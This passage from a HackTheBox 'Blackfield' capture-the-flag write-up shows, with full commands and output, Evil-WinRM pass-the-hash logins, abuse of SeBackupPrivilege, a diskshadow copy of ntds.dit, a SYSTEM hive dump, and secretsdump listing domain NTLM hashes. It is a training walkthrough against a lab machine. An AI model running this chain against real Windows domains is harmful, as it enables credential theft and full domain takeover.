in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.192 -u Administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62 -s '/ps1_scripts/' -e '/exe_files/'
[sudo] password for in7rud3r: 
Swipe your right index finger across the fingerprint reader

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1


But it doesn't work, probably it's an old dump and the password was changed. Let's try with the other user:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -s '/ps1_scripts/' -e '/exe_files/'

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_backup\Documents> 


And finally, we have the shell. Very simple now for the user flag, try to check if is available to the svc_backup user which we are connected and take it from the desired folder:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> pwd

Path
----
C:\Users\svc_backup\Documents


*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc_backup> ls


    Directory: C:\Users\svc_backup


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        2/23/2020   9:16 AM                3D Objects
d-r---        2/23/2020   9:16 AM                Contacts
d-r---        2/28/2020   2:26 PM                Desktop
d-r---        6/19/2020   2:05 PM                Documents
d-r---        2/23/2020   9:16 AM                Downloads
d-r---        2/23/2020   9:16 AM                Favorites
d-r---        2/23/2020   9:16 AM                Links
d-r---        2/23/2020   9:16 AM                Music
d-----        6/19/2020   8:53 AM                ntds
d-r---        2/23/2020   9:16 AM                Pictures
d-r---        2/23/2020   9:16 AM                Saved Games
d-r---        2/23/2020   9:16 AM                Searches
d-r---        2/23/2020   9:16 AM                Videos


*Evil-WinRM* PS C:\Users\svc_backup> cd Desktop
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> ls


    Directory: C:\Users\svc_backup\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        6/19/2020   4:16 AM             34 user.txt


*Evil-WinRM* PS C:\Users\svc_backup\Desktop> type user.txt
a******************************6
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> 


Well done, go for the root. Ok, try to reach the root.txt file, but you will have a bad surprise. You'll find also an additional file near the root.txt, that provide you with some other information, but, I think that I have not used it.

*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/28/2020   4:36 PM            447 notes.txt
-ar---        6/19/2020   4:16 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
Access to the path 'C:\Users\Administrator\Desktop\root.txt' is denied.
At line:1 char:1
+ type root.txt
+ ~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\Administrator\Desktop\root.txt:String) [Get-Content], UnauthorizedAccessException
    + FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type notes.txt
Mates,

After the domain compromise and computer forensic last week, auditors advised us to:
- change every passwords -- Done.
- change krbtgt password twice -- Done.
- disable auditor's account (audit2020) -- KO.
- use nominative domain admin accounts instead of this one -- KO.

We will probably have to backup & restore things later.
- Mike.

PS: Because the audit report is sensitive, I have encrypted it on the desktop (root.txt)
*Evil-WinRM* PS C:\Users\Administrator\Desktop> 


Another interesting tool, used to enumerate and investigate from the inside of a windows machine, is the winPEAS tool, available as executable or batch file. Upload it on the remote machine using the upload command of the Evil-WinRM tool and launch it. I report as usual the only information that provides me with some useful information:

*Evil-WinRM* PS C:\temp\not-this> ./winPEAS.bat
            *((,.,/((((((((((((((((((((/,  */
     ,/*,..*(((((((((((((((((((((((((((((((((,
[...]
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
[...]


It seems that with my current account I have these privileges. I concentrated on the SeBackupPrivilege, SeRestorePrivilege and SeIncreaseWorkingSetPrivilege. I can't find anything interesting for the last two, but the first one, give me some hope. Searching on google for "SeBackupPrivilege exploit":

giuliano108/SeBackupPrivilege
Use SE_BACKUP_NAME/SeBackupPrivilege to access objects you shouldn’t have access to - giuliano108/SeBackupPrivilege

Also in this case I lost a lot of hours to try and re-try it, because I cannot reach the outcome described on the description page, when finally I found the right sequence and commands to use on the target machine to reach the intent. But for first, upload the two library files on the remote machine:

*Evil-WinRM* PS C:\temp\not-this> upload /data/SeBackupPrivilegeCmdLets.dll

Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command

Info: Uploading /data/SeBackupPrivilegeCmdLets.dll to C:\temp\not-this\SeBackupPrivilegeCmdLets.dll

Data: 16384 bytes of 16384 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\temp\not-this> upload /data/SeBackupPrivilegeUtils.dll  

Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command

Info: Uploading /data/SeBackupPrivilegeUtils.dll to C:\temp\not-this\SeBackupPrivilegeUtils.dll

Data: 21844 bytes of 21844 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\temp\not-this> ls


    Directory: C:\temp\not-this


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/20/2020   4:20 PM          12288 SeBackupPrivilegeCmdLets.dll
-a----        6/20/2020   4:20 PM          16384 SeBackupPrivilegeUtils.dll
-a----        6/20/2020   2:54 PM          32976 winPEAS.bat


I list here two other useful links that help me to understand the right way to achieve the elevation privileges. One of the links, come from the winPEAS analysis, about the specific privileges that report:

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_->[*] BASIC USER INFO <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups
Windows Local Privilege Escalation

The second one is an extension of the first, I reach when, investigating on the problem, I found, trying the exploits, understand that I haven't access to the file also using the backup features available to my credential.

Hackplayers/PsCabesha-tools
Powershell crazy and sometimes diabolic scripts. Contribute to Hackplayers/PsCabesha-tools development by creating an account on GitHub.

The steps I'm going to describe are not useful to accomplish the hack, but it helped me to understand how to proceed and I'd like to explain it to you. Look at this...

*Evil-WinRM* PS C:\temp\not-this> whoami
blackfield\svc_backup
*Evil-WinRM* PS C:\temp\not-this> $acl = get-acl c:\Users\Administrator\Desktop\root.txt
*Evil-WinRM* PS C:\temp\not-this> $permisoacl = new-object System.Security.AccessControl.FileSystemAccessRule('BLACKFIELD\svc_backup','FullControl','None','None','Allow')
*Evil-WinRM* PS C:\temp\not-this> $acl.AddAccessRule($permisoacl)
*Evil-WinRM* PS C:\temp\not-this> set-acl -Path c:\Users\Administrator\Desktop\root.txt -AclObject $acl
*Evil-WinRM* PS C:\temp\not-this> type c:\Users\Administrator\Desktop\root.txt
Access to the path 'C:\Users\Administrator\Desktop\root.txt' is denied.
At line:1 char:1
+ type c:\Users\Administrator\Desktop\root.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\Administrator\Desktop\root.txt:String) [Get-Content], UnauthorizedAccessException
    + FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand


You can see that I cannot reach the file, but I should have the right access to it. A confirm I have when I try to backup the file, but again, I cannot access to it:

*Evil-WinRM* PS C:\temp\not-this> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\temp\not-this> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\temp\not-this> Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\root.txt -Overwrite
Opening input file. - Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
At line:1 char:1
+ Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
    + FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege
Obviously, many of you, with plus experience, will be thinking that I am unable because that is not the correct way to use these commands ... okay, I accept criticism, I discovered it at my expense, but like many of others that read my articles, I am learning and I want to remember that I come from a past of developer and not of system.

The stranger thing that I didn't understand in the immediate is exposed by that sequence of instruction executed on the shell:

*Evil-WinRM* PS C:\temp\not-this> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\temp\not-this> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\temp\not-this> Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\root.txt -Overwrite
Opening input file. - Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
At line:1 char:1
+ Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
    + FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege
*Evil-WinRM* PS C:\temp\not-this> get-acl -path c:\Users\Administrator\Desktop\root.txt | fl


Path   : Microsoft.PowerShell.Core\FileSystem::C:\Users\Administrator\Desktop\root.txt
Owner  : BUILTIN\Administrators
Group  : BLACKFIELD\Domain Users
Access : BLACKFIELD\Administrator Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         BLACKFIELD\Administrator Allow  FullControl
Audit  :
Sddl   : O:BAG:DUD:AI(A;;FA;;;LA)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LA)



*Evil-WinRM* PS C:\temp\not-this> $acl = get-acl c:\Users\Administrator\Desktop\root.txt
*Evil-WinRM* PS C:\temp\not-this> $permisoacl = new-object System.Security.AccessControl.FileSystemAccessRule('BLACKFIELD\svc_backup','FullControl','None','None','Allow')
*Evil-WinRM* PS C:\temp\not-this> $acl.AddAccessRule($permisoacl)
*Evil-WinRM* PS C:\temp\not-this> set-acl -Path c:\Users\Administrator\Desktop\root.txt -AclObject $acl
*Evil-WinRM* PS C:\temp\not-this> get-acl -path c:\Users\Administrator\Desktop\root.txt | fl


Path   : Microsoft.PowerShell.Core\FileSystem::C:\Users\Administrator\Desktop\root.txt
Owner  : BUILTIN\Administrators
Group  : BLACKFIELD\Domain Users
Access : BLACKFIELD\Administrator Allow  FullControl
         BLACKFIELD\svc_backup Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         BLACKFIELD\Administrator Allow  FullControl
Audit  :
Sddl   : O:BAG:DUD:AI(A;;FA;;;LA)(A;;FA;;;S-1-5-21-4194615774-2175524697-3563712290-1413)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LA)



*Evil-WinRM* PS C:\temp\not-this> Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\root.txt -Overwrite
Opening input file. - Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
At line:1 char:1
+ Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
    + FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege


As you can see, I have no access to the file in the beginning, but, after the hack, I have access, anyway, I cannot access the file. Same things happened when I found that article, about the ntds.dit file.

Technology Blogs & HTB Writeups
I created this site to use as a resource for myself, to share knowledge, and of course provide HackTheBox writeups
*Evil-WinRM* PS C:\temp\not-this\fhere> Copy-FileSeBackupPrivilege c:\windows\ntds\ntds.dit .\ntds.dit       
Opening input file. - The process cannot access the file because it is being used by another process. (Exception from HRESULT: 0x80070020)
At line:1 char:1
+ Copy-FileSeBackupPrivilege c:\windows\ntds\ntds.dit .\ntds.dit
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
    + FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege


From now on, I start to concentrate on the ntds.dit file, searching on the internet for specific use-cases.

Poc’ing Beyond Domain Admin - Part 1
OverviewDuring a CTF hosted at the beginning of this year, I popped the machine, got domain context, ran bloodhound as usual and saw that my compromised user was a member of a built-in group in Active Directory.While searching for that built-in AD groups and what privileges they had on google, it le…
*Evil-WinRM* PS C:\temp\not-this\fhere> echo "set context persistent nowriters" | out-file ./cmd -encoding ascii
*Evil-WinRM* PS C:\temp\not-this\fhere> echo "add volume c: alias temp" | out-file ./cmd -encoding ascii -append
*Evil-WinRM* PS C:\temp\not-this\fhere> echo "create" | out-file ./cmd -encoding ascii -append                        
*Evil-WinRM* PS C:\temp\not-this\fhere> echo "expose %temp% z:" | out-file ./cmd -encoding ascii -append      
*Evil-WinRM* PS C:\temp\not-this\fhere> cat cmd
set context persistent nowriters
add volume c: alias temp
create
expose %temp% z:
*Evil-WinRM* PS C:\temp\not-this\fhere> diskshadow.exe /s .\cmd
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  6/21/2020 1:30:12 PM

-> set context persistent nowriters
-> add volume c: alias temp
-> create
Alias temp for shadow ID {40b73fa4-0ba8-4c2b-a24e-870c35369800} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {2990c3a6-dcba-4515-9ceb-2f340f48ff3d} set as environment variable.

Querying all shadow copies with the shadow copy set ID {2990c3a6-dcba-4515-9ceb-2f340f48ff3d}

        * Shadow copy ID = {40b73fa4-0ba8-4c2b-a24e-870c35369800}               %temp%
                - Shadow copy set: {2990c3a6-dcba-4515-9ceb-2f340f48ff3d}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
                - Creation time: 6/21/2020 1:30:16 PM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8
                - Originating machine: DC01.BLACKFIELD.local
                - Service machine: DC01.BLACKFIELD.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %temp% z:
-> %temp% = {40b73fa4-0ba8-4c2b-a24e-870c35369800}
The shadow copy was successfully exposed as z:\.
->
*Evil-WinRM* PS C:\temp\not-this\fhere> Copy-FileSeBackupPrivilege z:\users\administrator\desktop\root.txt C:\temp\not-this\root.txt -Overwrite
Opening input file. - Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
At line:1 char:1
+ Copy-FileSeBackupPrivilege z:\users\administrator\desktop\root.txt C: ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
    + FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege
*Evil-WinRM* PS C:\temp\not-this\fhere> Copy-FileSeBackupPrivilege c:\windows\ntds\ntds.dit .\ntds.dit
Opening input file. - The process cannot access the file because it is being used by another process. (Exception from HRESULT: 0x80070020)
At line:1 char:1
+ Copy-FileSeBackupPrivilege c:\windows\ntds\ntds.dit .\ntds.dit
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
    + FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege


After a couple of days spent on these exploits, it seems that I am at a dead-end, but this last attempt, despite having given a negative result, inspires me more than the others, so I decided to restart the machine and rerun the whole process and finally...

*Evil-WinRM* PS C:\temp\not-this> Copy-FileSeBackupPrivilege z:\windows\ntds\ntds.dit .\ntds.dit -Overwrite
*Evil-WinRM* PS C:\temp\not-this> ls  


    Directory: C:\temp\not-this


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/21/2020   2:19 PM            617 2020-06-21_14-19-33_DC01.cab
-a----        6/21/2020   2:19 PM             86 cmd
-a----        6/21/2020   2:20 PM       18874368 ntds.dit
-a----        6/21/2020   2:15 PM          12288 SeBackupPrivilegeCmdLets.dll
-a----        6/21/2020   2:15 PM          16384 SeBackupPrivilegeUtils.dll


*Evil-WinRM* PS C:\temp\not-this> download ntds.dit /data/ntds.dit

Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command

Info: Downloading C:\temp\not-this\ntds.dit to /data/ntds.dit

Info: Download successful! 


Ok, let's go for the final part, download it and export the registry section that allows us to decrypt the password as described in the tutorial linked before.

*Evil-WinRM* PS C:\temp\not-this> reg save hklm\system c:\temp\system.bak
The operation completed successfully.

*Evil-WinRM* PS C:\temp\not-this> cd ..
*Evil-WinRM* PS C:\temp> ls


    Directory: C:\temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        6/21/2020   2:20 PM                not-this
-a----        6/21/2020   2:26 PM       17387520 system.bak


*Evil-WinRM* PS C:\temp> download .\system.bak /data/system.bak

Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command

Info: Downloading C:\temp\.\system.bak to /data/system.bak

Info: Download successful!


Now, impacket will be our last tools again:

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -ntds ntds.dit -system system.bak LOCAL

Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:65557f7ad03ac340a7eb12b9462f80d6:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c95ac94a048e7c29ac4b4320d7c9d3b5:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD538365:1106:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
[...]
BLACKFIELD.local\BLACKFIELD438814:1412:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
svc_backup:1413:aad3b435b51404eeaad3b435b51404ee:9658d1d1dcd9250115e2205d9f48400d:::
BLACKFIELD.local\lydericlefebvre:1414:aad3b435b51404eeaad3b435b51404ee:a2bc62c44415e12302885d742b0a6890:::
PC01$:1415:aad3b435b51404eeaad3b435b51404ee:de1e7748b6b292bfff4fd5adb54b4608:::
[...]
[*] Cleaning up... 


I could try to crack the hash code of the administrator, but remember that Evil-WinRM is our best friend, with the capability to use a HASH to connect to the target machine, so...

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee -s '/ps1_scripts/' -e '/exe_files/'

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
8******************************b
*Evil-WinRM* PS C:\Users\Administrator\Documents>


And so, also the root flag is mine. Thanks again, sorry if my practice to describe my fails, has extended this article, but I hope that you can learn from them!

That's all folks, see you next time!

The awesome image used in this article is called Cholo Girl and was created by DGIM Studio.